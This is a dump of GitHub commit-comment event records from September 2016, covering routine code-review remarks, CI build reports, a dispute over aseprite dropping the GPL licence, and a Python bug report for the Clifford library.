{"id":"4503118349","type":"CommitCommentEvent","actor":{"login":"roblourens"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18865106,"position":null,"line":null,"path":null,"commit_id":"f20867bf71b65e87005104df631d5ec101f1aebe","created_at":"2016-09-01T14:59:57Z","updated_at":"2016-09-01T14:59:57Z","body":"Some people might use leading spaces to indent some log messages? I've done that before. Not a big deal though."}},"created_at":"2016-09-01T14:59:57Z"}
{"id":"4503118459","type":"CommitCommentEvent","actor":{"login":"pascalbros"},"repo":{"name":"sensorberg-dev/BeaconOSX"},"payload":{"comment":{"id":18865107,"position":null,"line":null,"path":null,"commit_id":"44557cff28be3a39295407e8b8bb14f963bd5b46","created_at":"2016-09-01T14:59:59Z","updated_at":"2016-09-01T14:59:59Z","body":"It works again on El Capitan 10.11.6!!"}},"created_at":"2016-09-01T14:59:59Z"}
{"id":"4503119454","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18865111,"position":52,"line":52,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T15:00:12Z","updated_at":"2016-09-01T15:00:12Z","body":"I doubt we should store any sensitive data. At least not without user being aware."}},"created_at":"2016-09-01T15:00:12Z"}
{"id":"4503120248","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18865115,"position":24,"line":24,"path":"site/style.css","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T15:00:19Z","updated_at":"2016-09-01T15:00:19Z","body":"Consider a more semantic class name (see: https://www.w3.org/QA/Tips/goodclassnames)."}},"created_at":"2016-09-01T15:00:19Z"}
{"id":"4503120325","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18865114,"position":null,"line":null,"path":null,"commit_id":"65d0a9478dfcd6c503f78bdf91510e671ea0354f","created_at":"2016-09-01T15:00:19Z","updated_at":"2016-09-01T15:00:19Z","body":"I did try first with AuraScript, however this aura cannot proc at all, because aura owner is hunter."}},"created_at":"2016-09-01T15:00:19Z"}
{"id":"4503122672","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"joshlw04/battleship"},"payload":{"comment":{"id":18865122,"position":3,"line":3,"path":"JS/Cell.js","commit_id":"688866d5c776b49b27ad9f0d0e16ca4379217369","created_at":"2016-09-01T15:00:40Z","updated_at":"2016-09-01T15:00:40Z","body":"As I understand your code, you would be storing here if this position is a ship or not.   You COULD use a 0 or 1 to signify a no-ship or ship.  Does that clear that up?"}},"created_at":"2016-09-01T15:00:40Z"}
{"id":"4503126603","type":"CommitCommentEvent","actor":{"login":"JeromeMartinez"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865129,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:01:15Z","updated_at":"2016-09-01T15:01:15Z","body":"> In my experience, the GPL license wasn't beneficial for us. \r\n\r\nMaybe you'll see in the future that:\r\n- as your software is no more maintained in Linux distros, you get less users so you are less known\r\n- as your software is no more open source, contributors keep coding on an open source version (whose you can't use because your version is not open source)\r\n\r\n> Mainly because Linux distribution don't make it clear that they aren't associated in any form with the original developer of each application (and other issues).\r\n\r\nFalse excuse, there is no relationship with open source.\r\nIf you want to avoid the confusion with a version you distribute, you can forbid distros to use the name of your software, that's enough (this was done by a product owner called Mozilla for a product called Firefox, Debian used the name Iceweal instead and it was clear enough that bugs in distros are not always bugs in Debian; but actually this is no more the case because both parties discussed and found that it is better for everyone that software is in distros, with the right name).\r\n\r\n>  In my experience, the GPL license wasn't beneficial for us. \r\n\r\nGPL (and open source) is actually focused on users, who may not appreciate to lose the easiness of hacking it and redistribute it.\r\nThat said, \"it was not good for us\" is not really a reason for removing something, I would have expected an explanation more like \"it was bad for us because (...)\" (= how did they harm you?).\r\n\r\nThat's a pity that open source loses a software. But thanks to open source, the main developer can not decide alone of the fate of a software (this is the reason open source is useful), and users can decide too. I hope that [the open source version](https://github.com/aseprite-gpl/aseprite) replaces the non open source version as e.g. [X.org replaced XFree](https://en.wikipedia.org/wiki/X.Org_Server#History) when XFree86 decided to change the license to a non open source license (or maybe the main developer will change in mind about open source?)"}},"created_at":"2016-09-01T15:01:15Z"}
{"id":"4503126803","type":"CommitCommentEvent","actor":{"login":"Aerim"},"repo":{"name":"Cilenco/FeatureDiscovery"},"payload":{"comment":{"id":18865131,"position":null,"line":null,"path":null,"commit_id":"e2f76946a68f4bfeabc762775b88d013947c7c47","created_at":"2016-09-01T15:01:17Z","updated_at":"2016-09-01T15:01:17Z","body":"Hi, thanks for the reply.\r\nI mean for the big circle.\r\nOn the sample project when I change the background color inside the handler (the first time) It doesn't change, but I also modified them on the on click listeners for the menu items and it works there.\r\nThanks again for the quick reply"}},"created_at":"2016-09-01T15:01:17Z"}
{"id":"4503127144","type":"CommitCommentEvent","actor":{"login":"isidorn"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":18865133,"position":null,"line":null,"path":null,"commit_id":"f20867bf71b65e87005104df631d5ec101f1aebe","created_at":"2016-09-01T15:01:20Z","updated_at":"2016-09-01T15:01:20Z","body":"I am only trimming when calculating the height of the string, so at worst the height will be calculated wrong, though the original string is left untouched."}},"created_at":"2016-09-01T15:01:20Z"}
{"id":"4503127665","type":"CommitCommentEvent","actor":{"login":"gfelizola"},"repo":{"name":"goatslacker/alt"},"payload":{"comment":{"id":18865135,"position":null,"line":null,"path":null,"commit_id":"5b41cadc33b425c53c925de4cb0dafefe7a20982","created_at":"2016-09-01T15:01:25Z","updated_at":"2016-09-01T15:01:25Z","body":"+1"}},"created_at":"2016-09-01T15:01:25Z"}
{"id":"4503128098","type":"CommitCommentEvent","actor":{"login":"cdeil"},"repo":{"name":"gammapy/gammapy"},"payload":{"comment":{"id":18865136,"position":null,"line":null,"path":null,"commit_id":"d74630c49ebc3824076c1836dde7ea1bfecaba4e","created_at":"2016-09-01T15:01:28Z","updated_at":"2016-09-01T15:01:28Z","body":"This is beautiful.\r\n\r\nLet's stop with Python and use Bash / Make instead!\r\n(Karl actually did this once to compute simple images and spectra with FTOOLS).\r\n\r\n:-)"}},"created_at":"2016-09-01T15:01:28Z"}
{"id":"4503132757","type":"CommitCommentEvent","actor":{"login":"madhavsuresh"},"repo":{"name":"madhavsuresh/mta"},"payload":{"comment":{"id":18865149,"position":null,"line":null,"path":null,"commit_id":"f64f8a9af3a184c9d9f4084e85e88ecf9b64efff","created_at":"2016-09-01T15:02:11Z","updated_at":"2016-09-01T15:02:11Z","body":"@dcdowney I completely agree with everything you're saying, all of that refactoring is in flight. \r\n\r\nWith respect to the repetition:\r\n-I'm working on putting the json validation in middleware, loading all the file contents into singletons for injection (so we don't have to load on every request)\r\n-Going to move all the sql statements into a data manager.\r\n-also adding tests via this framework, it looks like effectively what we're doing in our ipython notebooks http://codeception.com/docs/10-WebServices"}},"created_at":"2016-09-01T15:02:11Z"}
{"id":"4503133727","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"arianadziedzic/pickUpSticks"},"payload":{"comment":{"id":18865152,"position":null,"line":null,"path":null,"commit_id":"bad36ab67fc0094e154039a6626cd81ddb259305","created_at":"2016-09-01T15:02:20Z","updated_at":"2016-09-01T15:02:20Z","body":"Let's get some more commits up here!"}},"created_at":"2016-09-01T15:02:20Z"}
{"id":"4503135058","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18865154,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-01T15:02:31Z","updated_at":"2016-09-01T15:02:31Z","body":"ah that's me likely then :)"}},"created_at":"2016-09-01T15:02:31Z"}
{"id":"4503138713","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865164,"position":null,"line":null,"path":null,"commit_id":"9c35d1a8c55d1483386ae47ab523e47da90b82ec","created_at":"2016-09-01T15:03:05Z","updated_at":"2016-09-01T15:03:05Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 892](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12239&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests passed: 29; compilation error: Scala compiler in Test Build time: 00:05:21"}},"created_at":"2016-09-01T15:03:05Z"}
{"id":"4503138873","type":"CommitCommentEvent","actor":{"login":"mstevetodd"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18865165,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-01T15:03:07Z","updated_at":"2016-09-01T15:03:07Z","body":"Yes, JMRI/lib/jsr305.jar does show in the \"build path\" in Eclipse. \r\njdk1.8.0_65 is specified in Eclipse."}},"created_at":"2016-09-01T15:03:07Z"}
{"id":"4503142363","type":"CommitCommentEvent","actor":{"login":"m1973m"},"repo":{"name":"m1973m/Example3"},"payload":{"comment":{"id":18865178,"position":2,"line":2,"path":".gitignore","commit_id":"63ad195b6ba7886b1c22b0fb213ff6a854f1ea21","created_at":"2016-09-01T15:03:37Z","updated_at":"2016-09-01T15:03:37Z","body":"+*.apk"}},"created_at":"2016-09-01T15:03:37Z"}
{"id":"4503142435","type":"CommitCommentEvent","actor":{"login":"houkanshan"},"repo":{"name":"SerotoninPharmaceuticals/LD36"},"payload":{"comment":{"id":18865179,"position":null,"line":null,"path":null,"commit_id":"db0212902c12cd40e277e6d9f208a0a43e1ecfeb","created_at":"2016-09-01T15:03:38Z","updated_at":"2016-09-01T15:03:38Z","body":"这个箱子，如果要做投入的效果的话，应该是再切一个正面面板的图出来，当被放入的物体动画运动到正上方的时候，将图层顺序调到正面面板和背面面板之间的位置"}},"created_at":"2016-09-01T15:03:38Z"}
{"id":"4503144656","type":"CommitCommentEvent","actor":{"login":"tamiko"},"repo":{"name":"dealii/dealii"},"payload":{"comment":{"id":18865182,"position":4,"line":33,"path":"doc/users/doxygen.html","commit_id":"757e2bb917a5886e68f05c1be2ecacd65729dc84","created_at":"2016-09-01T15:03:55Z","updated_at":"2016-09-01T15:03:55Z","body":"\nOn Thu, Sep  1, 2016, at 09:19 CDT, David Wells <notifications@github.com> wrote:\n\n> typo: should be 8.4.2\n\nFixed. Also removed the superfluous 8.4.1 link\n"}},"created_at":"2016-09-01T15:03:55Z"}
{"id":"4503147938","type":"CommitCommentEvent","actor":{"login":"arianadziedzic"},"repo":{"name":"arianadziedzic/pickUpSticks"},"payload":{"comment":{"id":18865189,"position":null,"line":null,"path":null,"commit_id":"bad36ab67fc0094e154039a6626cd81ddb259305","created_at":"2016-09-01T15:04:20Z","updated_at":"2016-09-01T15:04:20Z","body":"Eek! I was using a spike file yesterday. Will get commits asap!\n\nOn Thu, Sep 1, 2016 at 11:02 AM, Andrew <notifications@github.com> wrote:\n\n> Let's get some more commits up here!\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arianadziedzic/pickUpSticks/commit/bad36ab67fc0094e154039a6626cd81ddb259305#commitcomment-18865152>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATOWCgQBeTl1myiU8w9OQnhNyP5HNfvmks5qluj8gaJpZM4Jyyrk>\n> .\n>\n"}},"created_at":"2016-09-01T15:04:20Z"}
{"id":"4503149998","type":"CommitCommentEvent","actor":{"login":"kellerd"},"repo":{"name":"kellerd/CodexParser"},"payload":{"comment":{"id":18865190,"position":null,"line":null,"path":null,"commit_id":"7f55e7e9ab51d13d8c4a45d31dae0d25d56c0e9d","created_at":"2016-09-01T15:04:37Z","updated_at":"2016-09-01T15:04:37Z","body":"#4 "}},"created_at":"2016-09-01T15:04:37Z"}
{"id":"4503154022","type":"CommitCommentEvent","actor":{"login":"dacap"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865202,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:05:19Z","updated_at":"2016-09-01T15:05:19Z","body":"> I hope that the open source version replaces the non open source version\r\n\r\nIs like saying \"I hope you die.\" Now I know from which side I want to be."}},"created_at":"2016-09-01T15:05:19Z"}
{"id":"4503155806","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18865204,"position":36,"line":36,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T15:05:34Z","updated_at":"2016-09-01T15:05:34Z","body":"There is also no guarantee the token is not expired due to some reason."}},"created_at":"2016-09-01T15:05:34Z"}
{"id":"4503157140","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18865208,"position":null,"line":null,"path":null,"commit_id":"ac272125cd1d22eb526b1479b39cc34f5baa8367","created_at":"2016-09-01T15:05:45Z","updated_at":"2016-09-01T15:05:45Z","body":"develop (kbenne) - x86_64-MacOS-10.10-clang: OK (2380 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ac272125cd1d22eb526b1479b39cc34f5baa8367-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.22%25-yellow.svg)</a> \n"}},"created_at":"2016-09-01T15:05:45Z"}
{"id":"4503164095","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18865223,"position":35,"line":35,"path":"app/views/04_ElementDirectivesNgIfStripedTable.html","commit_id":"ec431b5314401b0518e7982039467bafad655bcb","created_at":"2016-09-01T15:06:49Z","updated_at":"2016-09-01T15:06:49Z","body":"Вместо условия можно просто вернуть `return value.length === 8`\r\nИ непонятно, что такое 8, нужно добавить комментарий."}},"created_at":"2016-09-01T15:06:49Z"}
{"id":"4503165723","type":"CommitCommentEvent","actor":{"login":"sungiklee"},"repo":{"name":"sungiklee/dojo_rules"},"payload":{"comment":{"id":18865224,"position":null,"line":null,"path":null,"commit_id":"5c0f9aa38304294baf23da21aa9f54e34a9bd70d","created_at":"2016-09-01T15:07:06Z","updated_at":"2016-09-01T15:07:06Z","body":"How about that? "}},"created_at":"2016-09-01T15:07:06Z"}
{"id":"4503165798","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18865225,"position":null,"line":null,"path":null,"commit_id":"4ea3f688bfdfde7fc709b15d960f93368b2519a8","created_at":"2016-09-01T15:07:07Z","updated_at":"2016-09-01T15:07:07Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.234.4ea3f688bfdfde7fc709b15d960f93368b2519a8](http://build.palaso.org/viewLog.html?buildId=76358&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1493, ignored: 17 Build time: 00:07:20"}},"created_at":"2016-09-01T15:07:07Z"}
{"id":"4503166337","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18865228,"position":33,"line":33,"path":"app/views/04_ElementDirectivesNgIfStripedTable.html","commit_id":"ec431b5314401b0518e7982039467bafad655bcb","created_at":"2016-09-01T15:07:12Z","updated_at":"2016-09-01T15:07:12Z","body":"Может быть лучше обозвать `this.isValid`?"}},"created_at":"2016-09-01T15:07:12Z"}
{"id":"4503166894","type":"CommitCommentEvent","actor":{"login":"ajaybhatt003"},"repo":{"name":"thotro/arduino-dw1000"},"payload":{"comment":{"id":18865230,"position":null,"line":null,"path":null,"commit_id":"a260a2d92e0a5b8700fdcdfe1887386119421c73","created_at":"2016-09-01T15:07:17Z","updated_at":"2016-09-01T15:07:17Z","body":"hey can anybody tell me what does \" PIN_SS = SS;\" indicates.PIN_SS has to be given number rather than characters?"}},"created_at":"2016-09-01T15:07:17Z"}
{"id":"4503168747","type":"CommitCommentEvent","actor":{"login":"parmentf"},"repo":{"name":"madec-project/ezref"},"payload":{"comment":{"id":18865234,"position":6,"line":6,"path":"config.sample.json","commit_id":"672adcbbdf4df97cd2c45fd1a108a4d6e9d3071f","created_at":"2016-09-01T15:07:33Z","updated_at":"2016-09-01T15:07:33Z","body":"Tiens? `vim` aurait un problème de configuration des indentations? ;P"}},"created_at":"2016-09-01T15:07:33Z"}
{"id":"4503170414","type":"CommitCommentEvent","actor":{"login":"krlmlr"},"repo":{"name":"rstats-db/RSQLite"},"payload":{"comment":{"id":18865238,"position":2,"line":2,"path":"src/Makevars.local","commit_id":"1d2912cc3b232705f6dd1a67bdf2af1222b123cf","created_at":"2016-09-01T15:07:48Z","updated_at":"2016-09-01T15:07:48Z","body":"This isn't part of the built package and doesn't need to be portable."}},"created_at":"2016-09-01T15:07:48Z"}
{"id":"4503173810","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"vofus/training_lesson_angular_todo-app"},"payload":{"comment":{"id":18865246,"position":6,"line":6,"path":"app/templates/table-row-template.html","commit_id":"ec431b5314401b0518e7982039467bafad655bcb","created_at":"2016-09-01T15:08:20Z","updated_at":"2016-09-01T15:08:20Z","body":"А зачем `ng-bind-template`, а не ` ng-bind` обычный?"}},"created_at":"2016-09-01T15:08:20Z"}
{"id":"4503173877","type":"CommitCommentEvent","actor":{"login":"FredLunnon"},"repo":{"name":"arsenovic/clifford"},"payload":{"comment":{"id":18865245,"position":null,"line":null,"path":null,"commit_id":"b8884d88f703b94906662a6c1673af043777f7b5","created_at":"2016-09-01T15:08:20Z","updated_at":"2016-09-01T15:08:20Z","body":"  It's little wonder Brombo doesn't respond to pull requests, if this\nresult is typical!  I realised that bug reports should ideally be elsewhere,\nbut have not yet made any sense of  <issues> .\n\n  One thing at a time.  Until you are able to merge my changes,\nthere doesn't seem to be a lot of point in undertaking further\ncomplications.\n\n  Below the text appended to <__init__.py>, copied directly from\n    https://github.com/FredLunnon/clifford/blob/master/clifford/__init__.py\n[Oddly, empty lines were omitted; I have restored them below.]\n\n\"\"\"\n# Reported / corrected by Fred Lunnon 28/08/16\n# python\n\n# Instantiate algebra and unit vectors\nfrom clifford import *;\np,q,r = 2,0,0;  # r = 0 !\nGAlayout, GAblades = Cl(p, q);\n(e0, e1) = ( GAblades[GAlayout.names[k+1]] for k in range(0, p+q) );\ntwo = 2 & e0 & e0;  # coerce scalar to multor\n\n# Bug in dual() : not involutory\nX = 1 + (e0 & e1);\nprint X; print ( X.dual() ).dual();  # unequal?\n# Corrected: file <__init__.py> lines 1380, 1389 : for \" * \" read \" & \"\n\n# Bug in add, subtract: type error etc. (NumPy issue?)\nX = 1 + (e0 & e1);  print X;  # multor!\nprint X.mag2() + X;  # array? wrong answer?\n\n# Bug in \"pretty\" polynomial o/p: list reverts to \"ugly\" o/p (Python issue?)\nprint(e0); print([e0, e1]);  # pretty!; ugly?\n\"\"\"\n\nWFL\n\n\nOn 9/1/16, Fred Lunnon <fred.lunnon@gmail.com> wrote:\n> xcode under OSX on Mac\n>\n>\n>\n> On 9/1/16, alex arsenovic <notifications@github.com> wrote:\n>> nothing there again. ....\n>>\n>>\n>> also if says its a binary, which doesnt make sense. what kind of editor\n>> are\n>> you using?\n>>\n>> --\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly or view it on GitHub:\n>> https://github.com/arsenovic/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5#commitcomment-18863345\n>\n"}},"created_at":"2016-09-01T15:08:20Z"}
{"id":"4503174324","type":"CommitCommentEvent","actor":{"login":"sieben"},"repo":{"name":"openwsn-berkeley/openwsn-sw"},"payload":{"comment":{"id":18865250,"position":null,"line":null,"path":null,"commit_id":"ab8383935bfa5e228df7df22ea2b53339b37816b","created_at":"2016-09-01T15:08:25Z","updated_at":"2016-09-01T15:08:25Z","body":"@twatteyne I've rebased and modified the commit:\r\nhttps://github.com/openwsn-berkeley/openwsn-sw/pull/133/commits/7959ae12f582b85b58f4c292ea159bf7dd8b5dc3"}},"created_at":"2016-09-01T15:08:25Z"}
{"id":"4503174922","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18865252,"position":48,"line":1105,"path":"scene/2d/physics_body_2d.cpp","commit_id":"5fc084c28e912c54bf64645df3e6cf2cd2c30be6","created_at":"2016-09-01T15:08:30Z","updated_at":"2016-09-01T15:08:30Z","body":"Er.. Debugging tests that made it in the commit? This code is not even used in production."}},"created_at":"2016-09-01T15:08:30Z"}
{"id":"4503176586","type":"CommitCommentEvent","actor":{"login":"100010"},"repo":{"name":"hatake511522/sample"},"payload":{"comment":{"id":18865254,"position":18,"line":18,"path":"db/schema.rb","commit_id":"065c3b73c1caa3758e0c3b0e36db1fc24afbfa45","created_at":"2016-09-01T15:08:45Z","updated_at":"2016-09-01T15:08:45Z","body":"number？\r\ndbに関しては作ってなかったっけ？\r\nちなみにnumberっていうカラムをユーザの番号としてつくったんならいらないよー\r\nidってカラムが自動生成されるから"}},"created_at":"2016-09-01T15:08:45Z"}
{"id":"4503176668","type":"CommitCommentEvent","actor":{"login":"EmilyK"},"repo":{"name":"shaunvadaketh/flask_hello_world"},"payload":{"comment":{"id":18865256,"position":null,"line":null,"path":null,"commit_id":"611e3ba606bbfedf94d3c6299c66b83ee682f117","created_at":"2016-09-01T15:08:46Z","updated_at":"2016-09-01T15:08:46Z","body":"@shaunvadaketh the actual code looks good to me. However, your commit is too big! And that's because you committed your virtual environment as well. Consider creating a .gitignore file and add your virtualenv to it."}},"created_at":"2016-09-01T15:08:46Z"}
{"id":"4503178162","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18865265,"position":36,"line":36,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T15:09:00Z","updated_at":"2016-09-01T15:09:00Z","body":"This also makes it impossible to use different credentials in future."}},"created_at":"2016-09-01T15:09:00Z"}
{"id":"4503178285","type":"CommitCommentEvent","actor":{"login":"nigelmegitt"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18865266,"position":4,"line":8,"path":"ebu_tt_live/xsd/ebutt_d.xsd","commit_id":"fe8a4a9dc3305aea1e7376b4430d4eb61da1ed96","created_at":"2016-09-01T15:09:02Z","updated_at":"2016-09-01T15:09:02Z","body":"timing attributes are not supposed to have a namespace. If they had one before, that was a bug!"}},"created_at":"2016-09-01T15:09:02Z"}
{"id":"4503183129","type":"CommitCommentEvent","actor":{"login":"joleroi"},"repo":{"name":"gammapy/gammapy"},"payload":{"comment":{"id":18865273,"position":null,"line":null,"path":null,"commit_id":"d74630c49ebc3824076c1836dde7ea1bfecaba4e","created_at":"2016-09-01T15:09:46Z","updated_at":"2016-09-01T15:09:46Z","body":"I agree, modules written and C and linked with bash scripts is the way to go :wink:\r\n"}},"created_at":"2016-09-01T15:09:46Z"}
{"id":"4503187085","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865282,"position":null,"line":null,"path":null,"commit_id":"9846c926813d75eabb319cb46011043e1b26735f","created_at":"2016-09-01T15:10:27Z","updated_at":"2016-09-01T15:10:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 894](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12252&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T15:10:27Z"}
{"id":"4503187091","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865281,"position":null,"line":null,"path":null,"commit_id":"842775a06412ea7eb117e4f9e96a25c44cbb9ddb","created_at":"2016-09-01T15:10:27Z","updated_at":"2016-09-01T15:10:27Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 893](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12249&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T15:10:27Z"}
{"id":"4503191227","type":"CommitCommentEvent","actor":{"login":"GrahamCampbell"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":18865290,"position":null,"line":null,"path":null,"commit_id":"0135851f1a684bbc2f700bf8523fea295825f7ce","created_at":"2016-09-01T15:11:05Z","updated_at":"2016-09-01T15:11:05Z","body":"@dakshhmehta That's gratitude right there! Don't use code we haven't release yet! "}},"created_at":"2016-09-01T15:11:05Z"}
{"id":"4503191379","type":"CommitCommentEvent","actor":{"login":"eagle79"},"repo":{"name":"TimothyVandenbrande/chronicles"},"payload":{"comment":{"id":18865291,"position":null,"line":null,"path":null,"commit_id":"79d4269e856b9a1ed0b5e494080c6a1926119fb2","created_at":"2016-09-01T15:11:08Z","updated_at":"2016-09-01T15:11:08Z","body":"@TrixieRaven mentioned you were talking about setting this up to dynamically handle the paging. \r\n\r\nIt _seems_ like it should be possible to change this to automatically \"know\" how many pages are in the directory (or at least put the maximum page number somewhere so it only has to be changed in one place). But after playing with it this morning and breaking it repeatedly, it's obviously not as easy as it sounds. I do think you could re-architect the page to use a single source document (still utilizing turn.js) containing all pages and loaded together (as opposed to individual pages loaded via AJAX) and that might make some of this a little easier (at the cost of slightly longer load times on the client).\r\n\r\nThat said, I don't think \"the juice is worth the squeeze\" as a coworker used to say. The book will not grow boundlessly and between the three of us, the work should be manageable with the way you have it set up. "}},"created_at":"2016-09-01T15:11:08Z"}
{"id":"4503194146","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18865295,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T15:11:33Z","updated_at":"2016-09-01T15:11:33Z","body":"Correct, yes."}},"created_at":"2016-09-01T15:11:33Z"}
{"id":"4503194264","type":"CommitCommentEvent","actor":{"login":"drorasaf"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":18865296,"position":null,"line":null,"path":null,"commit_id":"fa71f4420bd0b617f4f7d45a2d5c4fe2bbeeebb4","created_at":"2016-09-01T15:11:34Z","updated_at":"2016-09-01T15:11:34Z","body":"@codewarrior0 I have already changed this to os.errno.EEXIST\r\n@htgoebel why is the marker relevant? are there any plans to add exist_ok to python2?"}},"created_at":"2016-09-01T15:11:34Z"}
{"id":"4503195509","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18865299,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T15:11:46Z","updated_at":"2016-09-01T15:11:46Z","body":"Cool, I'll merge, fix JFD's things, and reupload shortly for testing."}},"created_at":"2016-09-01T15:11:46Z"}
{"id":"4503198061","type":"CommitCommentEvent","actor":{"login":"siusin"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":18865306,"position":null,"line":null,"path":null,"commit_id":"f2e47c637f787169d881010591e0056f79e31c06","created_at":"2016-09-01T15:12:11Z","updated_at":"2016-09-01T15:12:11Z","body":"BikeShed reported \"FATAL ERROR: Multiple local 'method' <dfn>s for 'HTMLCanvasElement' have the same linking text 'probablySupportsContext(contextId, arguments...)'.\"...\r\n\r\nPerhaps we can remove \"<dfn method for='HTMLCanvasElement'>\" in L1632?"}},"created_at":"2016-09-01T15:12:11Z"}
{"id":"4503198943","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"PrismarineMC/MagmaBlock"},"payload":{"comment":{"id":18865308,"position":null,"line":null,"path":null,"commit_id":"5d2256bed3c9f780915fac6b13dfbc646b96d19a","created_at":"2016-09-01T15:12:19Z","updated_at":"2016-09-01T15:12:19Z","body":"And how to run? Is it necessary to compile?"}},"created_at":"2016-09-01T15:12:19Z"}
{"id":"4503201823","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/EPAM-test-mockup"},"payload":{"comment":{"id":18865310,"position":98,"line":101,"path":"Angular/index.html","commit_id":"b3c52d1039a30f1881276ef29cb8af5bf6eeafb2","created_at":"2016-09-01T15:12:45Z","updated_at":"2016-09-01T15:12:45Z","body":"Можно использовать orderBy в шаблоне вместо кастомного метода для сортировки – https://docs.angularjs.org/api/ng/filter/orderBy"}},"created_at":"2016-09-01T15:12:45Z"}
